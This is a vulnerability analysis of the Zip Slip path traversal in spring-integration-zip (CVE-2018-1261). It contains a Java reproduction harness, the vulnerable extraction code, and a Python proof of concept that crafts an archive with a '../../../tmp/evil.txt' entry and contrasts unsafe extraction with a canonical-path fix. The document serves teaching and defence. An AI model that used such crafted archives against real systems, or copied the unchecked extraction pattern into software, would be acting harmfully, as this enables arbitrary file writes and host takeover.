1. Vulnerability information
Vulnerability name: Spring Integration Zip unsafe decompression
Vulnerability number: CVE-2018-1261
Vulnerability description: In versions of spring-integration-zip prior to 1.0.1.RELEASE, a malicious user can construct an archive (zip, and likewise bzip2, tar, xz, war, cpio and 7z) containing entries with specially crafted file names. When an application uses spring-integration-zip to decompress such an archive, the entries are written outside the intended directory, giving an arbitrary file write across directories. Depending on where the written file lands, this can in turn be used to get a shell and remotely control the host.
Vulnerability principle: An attacker constructs an archive whose entry names carry a `../` prefix (for example a name beginning with `../../../`). When spring-integration-zip extracts the archive it joins the entry name onto the work directory without checking the result, so the file is created outside the directory it was supposed to be confined to.
Exploit pre-conditions:
1. The application uses the spring-integration-zip library (before 1.0.1.RELEASE).
2. The application receives and decompresses archives from untrusted sources.
2. Environment setup
Libraries:
3. Vulnerability reproduction
Contents of the malicious archive:
The test code is as follows. The call

    unZipTransformer.setWorkDirectory(path);

sets the extraction directory. With it, good.txt is created inside the cve-2018-1261 directory, while the evil entry escapes that restriction and is written under the root directory.
    import org.springframework.core.io.DefaultResourceLoader;
    import org.springframework.core.io.Resource;
    import org.springframework.core.io.ResourceLoader;
    import org.springframework.integration.support.MessageBuilder;
    import org.springframework.integration.zip.transformer.UnZipTransformer;
    import org.springframework.messaging.Message;

    import java.io.File;
    import java.io.InputStream;

    public class Main {

        private static ResourceLoader resourceLoader = new DefaultResourceLoader();

        // extraction (work) directory for the transformer
        private static File path = new File("./cve-2018-1261/");

        public static void main(final String... args) {
            // the crafted archive, loaded from the test classpath
            final Resource evilResource = resourceLoader.getResource("classpath:zip-malicious-traversal.zip");
            try {
                InputStream evilIs = evilResource.getInputStream();
                Message<InputStream> evilMessage = MessageBuilder.withPayload(evilIs).build();

                UnZipTransformer unZipTransformer = new UnZipTransformer();
                // set the extraction directory to cve-2018-1261
                unZipTransformer.setWorkDirectory(path);
                unZipTransformer.afterPropertiesSet();

                // vulnerability entry point
                unZipTransformer.transform(evilMessage);
            } catch (Exception e) {
                System.out.println(e);
            }
        }
    }
UnZipTransformer.transform() in the example calls doZipTransform() to process the archive. That method iterates the archive with ZipUtil.iterate(), and the process() method of the ZipEntryCallback handles each entry (directory or file) as it is visited:
    ZipUtil.iterate(inputStream, new ZipEntryCallback() {
        @Override
        public void process(InputStream zipEntryInputStream, ZipEntry zipEntry) throws IOException {
            final String zipEntryName = zipEntry.getName();
            ...
            if (ZipResultType.FILE.equals(zipResultType)) {
                final File tempDir = new File(workDirectory, message.getHeaders().getId().toString());
                tempDir.mkdirs(); // NOSONAR false positive
                final File destinationFile = new File(tempDir, zipEntryName);
                if (zipEntry.isDirectory()) {
                    ...
                } else {
                    SpringZipUtils.copy(zipEntryInputStream, destinationFile);
                    uncompressedData.put(zipEntryName, destinationFile);
                }
            }
            ...
        }
    });
The `../../../` prefix comes straight from zipEntry.getName(). That string is then joined onto the per-message temp directory by

    final File destinationFile = new File(tempDir, zipEntryName);

which determines the extraction target. java.io.File neither normalises nor rejects `..` components, so the resulting path points outside tempDir. SpringZipUtils.copy() is then called: it reads the bytes of the entry from the archive's input stream and writes them to destinationFile. At no point on this path is the canonical destination compared against the work directory, which is the root cause of the traversal.
Note: the tmp folder under the root directory must be created in advance for the reproduction.
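The traversal analysed above, demonstrated as an added example that is not part of the original post or of spring-integration-zip. It is written in Python with only the standard library so it runs without a Spring project: it builds an archive with a `../`-prefixed entry in memory, extracts it with the same join-then-copy logic as the vulnerable process() callback, and then extracts it again with a canonical-path check of the kind the 1.0.1 fix introduced. The entry names good.txt and ../../../tmp/evil.txt, the scratch directory layout, and the check itself are my assumptions, not the library's code or the contents of the page's zip-malicious-traversal.zip.

```python
"""Zip Slip demonstration: the path-join-then-copy pattern of the vulnerable
UnZipTransformer callback next to a canonical-path check that rejects traversal."""
import io
import os
import tempfile
import zipfile

# Constructed sample entry names (assumptions): one benign file and one that
# climbs out of the extraction directory with a "../" prefix.
GOOD_ENTRY = "good.txt"
EVIL_ENTRY = "../../../tmp/evil.txt"


def build_malicious_zip() -> bytes:
    """Build the archive in memory; zipfile stores names verbatim, so "../" survives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(GOOD_ENTRY, "harmless\n")
        zf.writestr(EVIL_ENTRY, "escaped\n")
    return buf.getvalue()


def extract_vulnerable(zip_bytes: bytes, work_dir: str) -> dict:
    """Mirror of the vulnerable callback: new File(tempDir, zipEntryName), then copy,
    with no check that the result is still under work_dir."""
    written = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for entry in zf.infolist():
            dest = os.path.join(work_dir, entry.filename)  # == new File(tempDir, name)
            if entry.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with zf.open(entry) as src, open(dest, "wb") as dst:
                dst.write(src.read())  # == SpringZipUtils.copy(in, destinationFile)
            written[entry.filename] = os.path.abspath(dest)
    return written


def is_inside(root: str, name: str) -> bool:
    """True if archive entry `name` canonicalises to a path under `root`.
    Catches "../" prefixes, "sub/../../x" and absolute entry names alike."""
    root = os.path.realpath(root)
    dest = os.path.realpath(os.path.join(root, name))
    return dest == root or dest.startswith(root + os.sep)


def extract_safe(zip_bytes: bytes, work_dir: str) -> dict:
    """Hardened variant: validate every entry before writing a single byte, so a
    poisoned archive is rejected whole rather than partially extracted."""
    root = os.path.realpath(work_dir)
    written = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        entries = zf.infolist()
        bad = [e.filename for e in entries if not is_inside(root, e.filename)]
        if bad:
            raise ValueError(f"archive entries escape {root}: {bad}")
        for entry in entries:
            dest = os.path.realpath(os.path.join(root, entry.filename))
            if entry.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with zf.open(entry) as src, open(dest, "wb") as dst:
                dst.write(src.read())
            written[entry.filename] = dest
    return written


def demo(base_dir: str = None) -> dict:
    """Run both extractors under a scratch tree. The work dir is base/a/b/c, so the
    three "../" land the evil entry in base/tmp instead of the real /tmp."""
    base = base_dir or tempfile.mkdtemp(prefix="cve-2018-1261-")
    work = os.path.join(base, "a", "b", "c")
    os.makedirs(work, exist_ok=True)
    vuln = extract_vulnerable(build_malicious_zip(), work)

    safe_dir = os.path.join(base, "safe")
    try:
        extract_safe(build_malicious_zip(), safe_dir)
        rejected = False
    except ValueError:
        rejected = True
    safe_files = sum(len(files) for _, _, files in os.walk(safe_dir))

    return {
        "base": base,
        "work_dir": os.path.abspath(work),
        "vulnerable_evil_path": vuln[EVIL_ENTRY],
        "evil_file_exists": os.path.isfile(vuln[EVIL_ENTRY]),
        "safe_rejected": rejected,
        "safe_files_written": safe_files,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Entries are written by hand through ZipFile.open() rather than ZipFile.extract(), because Python's extract() already strips leading `../` and would hide the bug. The hardened routine validates all names before the first write; a check placed inside the per-entry loop would leave earlier benign entries on disk and is easy to forget on the directory branch.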
[Code Audit] Spring Integration Zip unsafe decompression (CVE-2018-1261) vulnerability analysis